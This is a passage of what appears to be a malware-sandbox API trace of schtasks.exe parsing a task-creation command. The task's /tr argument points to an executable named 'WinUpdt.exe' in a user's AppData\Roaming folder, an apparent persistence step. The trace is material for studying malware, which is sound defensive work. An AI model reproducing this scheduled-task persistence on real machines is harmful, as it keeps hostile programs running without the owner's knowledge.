_ArgList=0x29f450 | out: _Buffer="|tr|") returned 4 [0067.698] lstrlenW (lpString="|create|") returned 8 [0067.698] lstrlenW (lpString="|tr|") returned 4 [0067.698] StrStrIW (lpFirst="|create|", lpSrch="|tr|") returned 0x0 [0067.698] SetLastError (dwErrCode=0x490) [0067.698] lstrlenW (lpString="delete") returned 6 [0067.698] lstrlenW (lpString="delete") returned 6 [0067.698] _memicmp (_Buf1=0x674c90, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.698] lstrlenW (lpString="tr") returned 2 [0067.698] _memicmp (_Buf1=0x674cc0, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.698] _vsnwprintf (in: _Buffer=0x675318, _BufferCount=0x9, _Format="|%s|", _ArgList=0x29f450 | out: _Buffer="|delete|") returned 8 [0067.698] _vsnwprintf (in: _Buffer=0x6752d8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x29f450 | out: _Buffer="|tr|") returned 4 [0067.699] lstrlenW (lpString="|delete|") returned 8 [0067.699] lstrlenW (lpString="|tr|") returned 4 [0067.699] StrStrIW (lpFirst="|delete|", lpSrch="|tr|") returned 0x0 [0067.699] SetLastError (dwErrCode=0x490) [0067.699] lstrlenW (lpString="query") returned 5 [0067.699] lstrlenW (lpString="query") returned 5 [0067.699] _memicmp (_Buf1=0x674c90, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.699] lstrlenW (lpString="tr") returned 2 [0067.699] _memicmp (_Buf1=0x674cc0, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.699] _vsnwprintf (in: _Buffer=0x675318, _BufferCount=0x8, _Format="|%s|", _ArgList=0x29f450 | out: _Buffer="|query|") returned 7 [0067.699] _vsnwprintf (in: _Buffer=0x6752d8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x29f450 | out: _Buffer="|tr|") returned 4 [0067.699] lstrlenW (lpString="|query|") returned 7 [0067.699] lstrlenW (lpString="|tr|") returned 4 [0067.699] StrStrIW (lpFirst="|query|", lpSrch="|tr|") returned 0x0 [0067.699] SetLastError (dwErrCode=0x490) [0067.699] lstrlenW (lpString="change") returned 6 [0067.699] lstrlenW (lpString="change") returned 6 [0067.699] _memicmp (_Buf1=0x674c90, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.699] lstrlenW (lpString="tr") returned 2 [0067.699] _memicmp (_Buf1=0x674cc0, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.699] _vsnwprintf (in: _Buffer=0x675318, _BufferCount=0x9, _Format="|%s|", _ArgList=0x29f450 | out: _Buffer="|change|") returned 8 [0067.699] _vsnwprintf (in: _Buffer=0x6752d8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x29f450 | out: _Buffer="|tr|") returned 4 [0067.699] lstrlenW (lpString="|change|") returned 8 [0067.699] lstrlenW (lpString="|tr|") returned 4 [0067.699] StrStrIW (lpFirst="|change|", lpSrch="|tr|") returned 0x0 [0067.699] SetLastError (dwErrCode=0x490) [0067.699] lstrlenW (lpString="run") returned 3 [0067.699] lstrlenW (lpString="run") returned 3 [0067.699] _memicmp (_Buf1=0x674c90, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.699] lstrlenW (lpString="tr") returned 2 [0067.699] _memicmp (_Buf1=0x674cc0, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.699] _vsnwprintf (in: _Buffer=0x675318, _BufferCount=0x6, _Format="|%s|", _ArgList=0x29f450 | out: _Buffer="|run|") returned 5 [0067.699] _vsnwprintf (in: _Buffer=0x6752d8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x29f450 | out: _Buffer="|tr|") returned 4 [0067.699] lstrlenW (lpString="|run|") returned 5 [0067.699] lstrlenW (lpString="|tr|") returned 4 [0067.699] StrStrIW (lpFirst="|run|", lpSrch="|tr|") returned 0x0 [0067.699] SetLastError (dwErrCode=0x490) [0067.700] lstrlenW (lpString="end") returned 3 [0067.700] lstrlenW (lpString="end") returned 3 [0067.700] _memicmp (_Buf1=0x674c90, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.700] lstrlenW (lpString="tr") returned 2 [0067.700] _memicmp (_Buf1=0x674cc0, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.700] _vsnwprintf (in: _Buffer=0x675318, _BufferCount=0x6, _Format="|%s|", _ArgList=0x29f450 | out: _Buffer="|end|") returned 5 [0067.700] _vsnwprintf (in: _Buffer=0x6752d8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x29f450 | out: _Buffer="|tr|") returned 4 [0067.700] lstrlenW (lpString="|end|") returned 5 [0067.700] lstrlenW (lpString="|tr|") returned 4 [0067.700] StrStrIW (lpFirst="|end|", lpSrch="|tr|") returned 0x0 [0067.700] SetLastError (dwErrCode=0x490) [0067.700] lstrlenW (lpString="showsid") returned 7 [0067.700] lstrlenW (lpString="showsid") returned 7 [0067.700] _memicmp (_Buf1=0x674c90, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.700] lstrlenW (lpString="tr") returned 2 [0067.700] _memicmp (_Buf1=0x674cc0, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.700] _vsnwprintf (in: _Buffer=0x675318, _BufferCount=0xa, _Format="|%s|", _ArgList=0x29f450 | out: _Buffer="|showsid|") returned 9 [0067.700] _vsnwprintf (in: _Buffer=0x6752d8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x29f450 | out: _Buffer="|tr|") returned 4 [0067.700] lstrlenW (lpString="|showsid|") returned 9 [0067.700] lstrlenW (lpString="|tr|") returned 4 [0067.700] StrStrIW (lpFirst="|showsid|", lpSrch="|tr|") returned 0x0 [0067.700] SetLastError (dwErrCode=0x490) [0067.700] SetLastError (dwErrCode=0x490) [0067.700] SetLastError (dwErrCode=0x0) [0067.700] lstrlenW (lpString="/tr") returned 3 [0067.700] StrChrIW (lpStart="/tr", wMatch=0x3a) returned 0x0 [0067.700] SetLastError (dwErrCode=0x490) [0067.700] SetLastError (dwErrCode=0x0) [0067.700] lstrlenW (lpString="/tr") returned 3 [0067.700] GetProcessHeap () returned 0x660000 [0067.700] RtlAllocateHeap (HeapHandle=0x660000, Flags=0xc, Size=0x8) returned 0x676958 [0067.700] GetProcessHeap () returned 0x660000 [0067.700] RtlAllocateHeap (HeapHandle=0x660000, Flags=0xc, Size=0x14) returned 0x675418 [0067.700] SetLastError (dwErrCode=0x0) [0067.700] SetLastError (dwErrCode=0x0) [0067.700] lstrlenW (lpString="'C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WinUpdt.exe'") returned 59 [0067.700] lstrlenW (lpString="-/") returned 2 [0067.700] StrChrIW (lpStart="-/", wMatch=0x27) returned 0x0 [0067.700] SetLastError (dwErrCode=0x490) [0067.700] SetLastError (dwErrCode=0x490) [0067.701] SetLastError (dwErrCode=0x0) [0067.701] lstrlenW (lpString="'C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WinUpdt.exe'") returned 59 [0067.701] StrChrIW (lpStart="'C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WinUpdt.exe'", wMatch=0x3a) returned=":\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WinUpdt.exe'" [0067.701] lstrlenW (lpString="'C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WinUpdt.exe'") returned 59 [0067.701] GetProcessHeap () returned 0x660000 [0067.701] RtlAllocateHeap (HeapHandle=0x660000, Flags=0xc, Size=0x10) returned 0x674cf0 [0067.701] _memicmp (_Buf1=0x674cf0, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.701] GetProcessHeap () returned 0x660000 [0067.701] RtlAllocateHeap (HeapHandle=0x660000, Flags=0xc, Size=0xe) returned 0x674d08 [0067.701] GetProcessHeap () returned 0x660000 [0067.701] RtlAllocateHeap (HeapHandle=0x660000, Flags=0xc, Size=0x10) returned 0x674d20 [0067.701] _memicmp (_Buf1=0x674d20, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.701] GetProcessHeap () returned 0x660000 [0067.701] RtlAllocateHeap (HeapHandle=0x660000, Flags=0xc, Size=0x7a) returned 0x676968 [0067.701] SetLastError (dwErrCode=0x7a) [0067.701] SetLastError (dwErrCode=0x0) [0067.701] SetLastError (dwErrCode=0x0) [0067.701] lstrlenW (lpString="'C") returned 2 [0067.701] lstrlenW (lpString="-/") returned 2 [0067.701] StrChrIW (lpStart="-/", wMatch=0x27) returned 0x0 [0067.701] SetLastError (dwErrCode=0x490) [0067.701] SetLastError (dwErrCode=0x490) [0067.701] SetLastError (dwErrCode=0x0) [0067.701] lstrlenW (lpString="'C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\WinUpdt.exe'") returned 59 [0067.701] GetProcessHeap () returned 0x660000 [0067.701] RtlAllocateHeap (HeapHandle=0x660000, Flags=0xc, Size=0x78) returned 0x66f6f0 [0067.701] GetProcessHeap () returned 0x660000 [0067.701] RtlAllocateHeap (HeapHandle=0x660000, Flags=0xc, Size=0x14) returned 0x675438 [0067.701] SetLastError (dwErrCode=0x0) [0067.701] GetProcessHeap () returned 0x660000 [0067.701] GetProcessHeap () returned 0x660000 [0067.701] HeapValidate (hHeap=0x660000, dwFlags=0x0, lpMem=0x676918) returned 1 [0067.701] GetProcessHeap () returned 0x660000 [0067.701] RtlSizeHeap (HeapHandle=0x660000, Flags=0x0, MemoryPointer=0x676918) returned 0x6 [0067.701] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x676918 | out: hHeap=0x660000) returned 1 [0067.701] GetProcessHeap () returned 0x660000 [0067.701] GetProcessHeap () returned 0x660000 [0067.701] HeapValidate (hHeap=0x660000, dwFlags=0x0, lpMem=0x6752f8) returned 1 [0067.702] GetProcessHeap () returned 0x660000 [0067.702] RtlSizeHeap (HeapHandle=0x660000, Flags=0x0, MemoryPointer=0x6752f8) returned 0x14 [0067.702] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6752f8 | out: hHeap=0x660000) returned 1 [0067.702] GetProcessHeap () returned 0x660000 [0067.702] GetProcessHeap () returned 0x660000 [0067.702] HeapValidate (hHeap=0x660000, dwFlags=0x0, lpMem=0x676928) returned 1 [0067.702] GetProcessHeap () returned 0x660000 [0067.702] RtlSizeHeap (HeapHandle=0x660000, Flags=0x0, MemoryPointer=0x676928) returned 0x8 [0067.702] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x676928 | out: hHeap=0x660000) returned 1 [0067.702] GetProcessHeap () returned 0x660000 [0067.702] GetProcessHeap () returned 0x660000 [0067.702] HeapValidate (hHeap=0x660000, dwFlags=0x0, lpMem=0x675338) returned 1 [0067.702] GetProcessHeap () returned 0x660000 [0067.702] RtlSizeHeap (HeapHandle=0x660000, Flags=0x0, MemoryPointer=0x675338) returned 0x14 [0067.702] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x675338 | out: hHeap=0x660000) returned 1 [0067.702] GetProcessHeap () returned 0x660000 [0067.702] GetProcessHeap () returned 0x660000 [0067.702] HeapValidate (hHeap=0x660000, dwFlags=0x0, lpMem=0x674ca8) returned 1 [0067.702] GetProcessHeap () returned 0x660000 [0067.702] RtlSizeHeap (HeapHandle=0x660000, Flags=0x0, MemoryPointer=0x674ca8) returned 0x10 [0067.702] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x674ca8 | out: hHeap=0x660000) returned 1 [0067.702] GetProcessHeap () returned 0x660000 [0067.702] GetProcessHeap () returned 0x660000 [0067.702] HeapValidate (hHeap=0x660000, dwFlags=0x0, lpMem=0x675358) returned 1 [0067.702] GetProcessHeap () returned 0x660000 [0067.702] RtlSizeHeap (HeapHandle=0x660000, Flags=0x0, MemoryPointer=0x675358) returned 0x14 [0067.702] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x675358 | out: hHeap=0x660000) returned 1 [0067.702] GetProcessHeap () returned 0x660000 [0067.702] GetProcessHeap () returned 0x660000 [0067.702] HeapValidate (hHeap=0x660000, dwFlags=0x0, lpMem=0x676938) returned 1 [0067.702] GetProcessHeap () returned 0x660000 [0067.702] RtlSizeHeap (HeapHandle=0x660000, Flags=0x0, MemoryPointer=0x676938) returned 0x8 [0067.702] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x676938 | out: hHeap=0x660000) returned 1 [0067.702] GetProcessHeap () returned 0x660000 [0067.702] GetProcessHeap () returned 0x660000 [0067.702] HeapValidate (hHeap=0x660000, dwFlags=0x0, lpMem=0x675378) returned 1 [0067.702] GetProcessHeap () returned 0x660000 [0067.703] RtlSizeHeap (HeapHandle=0x660000, Flags=0x0, MemoryPointer=0x675378) returned 0x14 [0067.703] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x675378 | out: hHeap=0x660000) returned 1 [0067.703] GetProcessHeap () returned 0x660000 [0067.703] GetProcessHeap () returned 0x660000 [0067.703] HeapValidate (hHeap=0x660000, dwFlags=0x0, lpMem=0x674cd8) returned 1 [0067.703] GetProcessHeap () returned 0x660000 [0067.703] RtlSizeHeap (HeapHandle=0x660000, Flags=0x0, MemoryPointer=0x674cd8) returned 0x10 [0067.703] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x674cd8 | out: hHeap=0x660000) returned 1 [0067.703] GetProcessHeap () returned 0x660000 [0067.703] GetProcessHeap () returned 0x660000 [0067.703] HeapValidate (hHeap=0x660000, dwFlags=0x0, lpMem=0x675398) returned 1 [0067.703] GetProcessHeap () returned 0x660000 [0067.703] RtlSizeHeap (HeapHandle=0x660000, Flags=0x0, MemoryPointer=0x675398) returned 0x14 [0067.703] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x675398 | out: hHeap=0x660000) returned 1 [0067.703] GetProcessHeap () returned 0x660000 [0067.703] GetProcessHeap () returned 0x660000 [0067.703] HeapValidate (hHeap=0x660000, dwFlags=0x0, lpMem=0x676948) returned 1 [0067.703] GetProcessHeap () returned 0x660000 [0067.703] RtlSizeHeap (HeapHandle=0x660000, Flags=0x0, MemoryPointer=0x676948) returned 0x8 [0067.703] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x676948 | out: hHeap=0x660000) returned 1 [0067.703] GetProcessHeap () returned 0x660000 [0067.703] GetProcessHeap () returned 0x660000 [0067.703] HeapValidate (hHeap=0x660000, dwFlags=0x0, lpMem=0x6753b8) returned 1 [0067.703] GetProcessHeap () returned 0x660000 [0067.703] RtlSizeHeap (HeapHandle=0x660000, Flags=0x0, MemoryPointer=0x6753b8) returned 0x14 [0067.703] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6753b8 | out: hHeap=0x660000) returned 1 [0067.703] GetProcessHeap () returned 0x660000 [0067.703] GetProcessHeap () returned 0x660000 [0067.703] HeapValidate (hHeap=0x660000, dwFlags=0x0, lpMem=0x6753d8) returned 1 [0067.703] GetProcessHeap () returned 0x660000 [0067.703] RtlSizeHeap (HeapHandle=0x660000, Flags=0x0, MemoryPointer=0x6753d8) returned 0x14 [0067.703] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6753d8 | out: hHeap=0x660000) returned 1 [0067.703] GetProcessHeap () returned 0x660000 [0067.703] GetProcessHeap () returned 0x660000 [0067.703] HeapValidate (hHeap=0x660000, dwFlags=0x0, lpMem=0x6753f8) returned 1 [0067.703] GetProcessHeap () returned 0x660000 [0067.703] RtlSizeHeap (HeapHandle=0x660000, Flags=0x0, MemoryPointer=0x6753f8) returned 0x14 [0067.703] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6753f8 | out: hHeap=0x660000) returned 1 [0067.703] GetProcessHeap () returned 0x660000 [0067.703] GetProcessHeap () returned 0x660000 [0067.703] HeapValidate (hHeap=0x660000, dwFlags=0x0, lpMem=0x676958) returned 1 [0067.704] GetProcessHeap () returned 0x660000 [0067.704] RtlSizeHeap (HeapHandle=0x660000, Flags=0x0, MemoryPointer=0x676958) returned 0x8 [0067.704] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x676958 | out: hHeap=0x660000) returned 1 [0067.704] GetProcessHeap () returned 0x660000 [0067.704] GetProcessHeap () returned 0x660000 [0067.704] HeapValidate (hHeap=0x660000, dwFlags=0x0, lpMem=0x675418) returned 1 [0067.704] GetProcessHeap () returned 0x660000 [0067.704] RtlSizeHeap (HeapHandle=0x660000, Flags=0x0, MemoryPointer=0x675418) returned 0x14 [0067.704] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x675418 | out: hHeap=0x660000) returned 1 [0067.704] GetProcessHeap () returned 0x660000 [0067.704] GetProcessHeap () returned 0x660000 [0067.704] HeapValidate (hHeap=0x660000, dwFlags=0x0, lpMem=0x66f6f0) returned 1 [0067.704] GetProcessHeap () returned 0x660000 [0067.704] RtlSizeHeap (HeapHandle=0x660000, Flags=0x0, MemoryPointer=0x66f6f0) returned 0x78 [0067.704] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x66f6f0 | out: hHeap=0x660000) returned 1 [0067.704] GetProcessHeap () returned 0x660000 [0067.704] GetProcessHeap () returned 0x660000 [0067.704] HeapValidate (hHeap=0x660000, dwFlags=0x0, lpMem=0x675438) returned 1 [0067.704] GetProcessHeap () returned 0x660000 [0067.704] RtlSizeHeap (HeapHandle=0x660000, Flags=0x0, MemoryPointer=0x675438) returned 0x14 [0067.704] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x675438 | out: hHeap=0x660000) returned 1 [0067.704] GetProcessHeap () returned 0x660000 [0067.704] GetProcessHeap () returned 0x660000 [0067.704] HeapValidate (hHeap=0x660000, dwFlags=0x0, lpMem=0x674b88) returned 1 [0067.704] GetProcessHeap () returned 0x660000 [0067.704] RtlSizeHeap (HeapHandle=0x660000, Flags=0x0, MemoryPointer=0x674b88) returned 0x10 [0067.704] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x674b88 | out: hHeap=0x660000) returned 1 [0067.704] SetLastError (dwErrCode=0x0) [0067.704] VerSetConditionMask (ConditionMask=0x0, TypeMask=0x0, Condition=0x2) returned 0x18 [0067.705] VerSetConditionMask (ConditionMask=0x18, TypeMask=0x80000000, Condition=0x1) returned 0x1b [0067.705] VerSetConditionMask (ConditionMask=0x1b, TypeMask=0x80000000, Condition=0x20) returned 0x1801b [0067.705] VerifyVersionInfoW (in: lpVersionInformation=0x29c868, dwTypeMask=0x3, dwlConditionMask=0x1801b | out: lpVersionInformation=0x29c868) returned 1 [0067.705] SetLastError (dwErrCode=0x0) [0067.705] lstrlenW (lpString="create") returned 6 [0067.705] StrChrIW (lpStart="create", wMatch=0x7c) returned 0x0 [0067.705] SetLastError (dwErrCode=0x490) [0067.705] SetLastError (dwErrCode=0x0) [0067.705] lstrlenW (lpString="create") returned 6 [0067.705] GetProcessHeap () returned 0x660000 [0067.705] RtlAllocateHeap (HeapHandle=0x660000, Flags=0xc, Size=0x14) returned 0x675438 [0067.705] GetProcessHeap () returned 0x660000 [0067.705] RtlAllocateHeap (HeapHandle=0x660000, Flags=0xc, Size=0x10) returned 0x674b88 [0067.705] _memicmp (_Buf1=0x674b88, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.705] GetProcessHeap () returned 0x660000 [0067.705] RtlAllocateHeap (HeapHandle=0x660000, Flags=0xc, Size=0x16) returned 0x675418 [0067.705] SetLastError (dwErrCode=0x0) [0067.705] _memicmp (_Buf1=0x674c00, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.705] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x675a40, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\schtasks.exe" (normalized: "c:\\windows\\syswow64\\schtasks.exe")) returned 0x20 [0067.705] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\SysWOW64\\schtasks.exe", lpdwHandle=0x0 | out: lpdwHandle=0x0) returned 0x744 [0067.705] GetProcessHeap () returned 0x660000 [0067.705] RtlAllocateHeap (HeapHandle=0x660000, Flags=0xc, Size=0x74e) returned 0x675c50 [0067.705] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\SysWOW64\\schtasks.exe", dwHandle=0x0, dwLen=0x74e, lpData=0x675c50 | out: lpData=0x675c50) returned 1 [0067.705] VerQueryValueW (in: pBlock=0x675c50, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x29c970, puLen=0x29c974 | out: lplpBuffer=0x29c970*=0x675fec, puLen=0x29c974) returned 1 [0067.705] _memicmp (_Buf1=0x674c00, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.705] _vsnwprintf (in: _Buffer=0x675a40, _BufferCount=0x3f, _Format="\\StringFileInfo\\%04x%04x\\InternalName", _ArgList=0x29c958 | out: _Buffer="\\StringFileInfo\\040904b0\\InternalName") returned 37 [0067.706] VerQueryValueW (in: pBlock=0x675c50, lpSubBlock="\\StringFileInfo\\040904b0\\InternalName", lplpBuffer=0x29c980, puLen=0x29c97c | out: lplpBuffer=0x29c980*=0x675e18, puLen=0x29c97c) returned 1 [0067.706] lstrlenW (lpString="schtasks.exe") returned 12 [0067.706] lstrlenW (lpString="schtasks.exe") returned 12 [0067.706] lstrlenW (lpString=".EXE") returned 4 [0067.706] StrStrIW (lpFirst="schtasks.exe", lpSrch=".EXE") returned=".exe" [0067.706] lstrlenW (lpString="schtasks.exe") returned 12 [0067.706] lstrlenW (lpString=".EXE") returned 4 [0067.706] lstrlenW (lpString="schtasks") returned 8 [0067.706] lstrlenW (lpString="/create") returned 7 [0067.706] _memicmp (_Buf1=0x674c00, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.706] _vsnwprintf (in: _Buffer=0x675a40, _BufferCount=0x19, _Format="%s %s", _ArgList=0x29c958 | out: _Buffer="schtasks /create") returned 16 [0067.706] _memicmp (_Buf1=0x674c60, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.706] GetProcessHeap () returned 0x660000 [0067.706] RtlAllocateHeap (HeapHandle=0x660000, Flags=0xc, Size=0x14) returned 0x6753f8 [0067.706] _memicmp (_Buf1=0x674c78, _Buf2=0x511ed8, _Size=0x7) returned 0 [0067.706] LoadStringW (in: hInstance=0x0, uID=0x15ed, lpBuffer=0x6766d8, cchBufferMax=256 | out: lpBuffer="Type \"%s /?\" for usage.") returned 0x17 [0067.706] lstrlenW (lpString="Type \"%s /?\" for usage.") returned 23 [0067.706] GetProcessHeap () returned 0x660000 [0067.706] RtlAllocateHeap (HeapHandle=0x660000, Flags=0xc, Size=0x30) returned 0x676918 [0067.706] _vsnwprintf (in: _Buffer=0x676630, _BufferCount=0x4f, _Format="Type \"%s /?\" for usage.", _ArgList=0x29c95c | out: _Buffer="Type \"SCHTASKS /CREATE /?\" for usage.") returned 37 [0067.706] GetProcessHeap () returned 0x660000 [0067.706] GetProcessHeap () returned 0x660000 [0067.706] HeapValidate (hHeap=0x660000, dwFlags=0x0, lpMem=0x675c50) returned 1 [0067.706] GetProcessHeap () returned 0x660000 [0067.706] RtlSizeHeap (HeapHandle=0x660000, Flags=0x0, MemoryPointer=0x675c50) returned 0x74e [0067.706] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x675c50 | out: hHeap=0x660000) returned 1 [0067.706] SetLastError (dwErrCode=0x0) [0067.706] GetThreadLocale () returned 0x409 [0067.706] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0067.706] lstrlenW (lpString="create") returned 6 [0067.706] GetThreadLocale () returned 0x409 [0067.706] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0067.706] lstrlenW (lpString="?") returned 1 [0067.706] GetThreadLocale () returned 0x409 [0067.706] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0067.706] lstrlenW (lpString="s") returned 1 [0067.706] GetThreadLocale () returned 0x409 [0067.707] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0067.707] lstrlenW (lpString="u") returned 1 [0067.707] GetThreadLocale () returned 0x409 [0067.707] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0067.707] lstrlenW (lpString="p") returned 1 [0067.707] GetThreadLocale () returned 0x409 [0067.707] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0067.707] lstrlenW (lpString="ru") returned 2 [0067.707] GetThreadLocale () returned 0x409 [0067.707] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0067.707] lstrlenW (lpString="rp") returned 2 [0067.707] GetThreadLocale () returned 0x409 [0067.707] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0067.707] lstrlenW (lpString="sc") returned 2 [0067.707] GetThreadLocale () returned 0x409 [0067.707] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0067.707] lstrlenW (lpString="mo") returned 2 [0067.707] GetThreadLocale () returned 0x409 [0067.707] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0067.707] lstrlenW (lpString="d") returned 1 [0067.707] GetThreadLocale () returned 0x409 [0067.707] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0067.707] lstrlenW (lpString="m") returned 1 [0067.707] GetThreadLocale () returned 0x409 [0067.707] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0067.707] lstrlenW (lpString="i") returned 1 [0067.707] GetThreadLocale () returned 0x409 [0067.707] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0067.707] lstrlenW (lpString="tn") returned 2 [0067.707] GetThreadLocale () returned 0x409 [0067.707] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0067.707] lstrlenW (lpString="tr") returned 2 [0067.707] GetThreadLocale () returned 0x409 [0067.707] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0067.707] lstrlenW (lpString="st") returned 2 [0067.707] GetThreadLocale () returned 0x409 [0067.707] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0067.707] lstrlenW (lpString="sd") returned 2 [0067.707] GetThreadLocale () returned 0x409 [0067.707] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0067.707] lstrlenW (lpString="ed") returned 2 [0067.707] GetThreadLocale () returned 0x409 [0067.707] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0067.708] lstrlenW (lpString="it") returned 2 [0067.708] GetThreadLocale () returned 0x409 [0067.708] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0067.708] lstrlenW (lpString="et") returned 2 [0067.708] GetThreadLocale () returned 0x409 [0067.708] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0067.708] lstrlenW (lpString="k") returned 1 [0067.708] GetThreadLocale () returned 0x409 [0067.708] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0067.708] lstrlenW (lpString="du") returned 2 [0067.708] GetThreadLocale () returned 0x409 [0067.708] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0067.708] lstrlenW (lpString="ri") returned 2 [0067.708] GetThreadLocale () returned 0x409 [0067.708] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0067.708] lstrlenW (lpString="z") returned 1 [0067.708] GetThreadLocale () returned 0x409 [0067.708] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0067.708] lstrlenW (lpString="f") returned 1 [0067.708] GetThreadLocale () returned 0x409 [0067.708] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0067.708] lstrlenW (lpString="v1") returned 2 [0067.708] GetThreadLocale () returned 0x409 [0067.708] CompareStringA (Locale=0x409, dwCmpFlags=0x1, 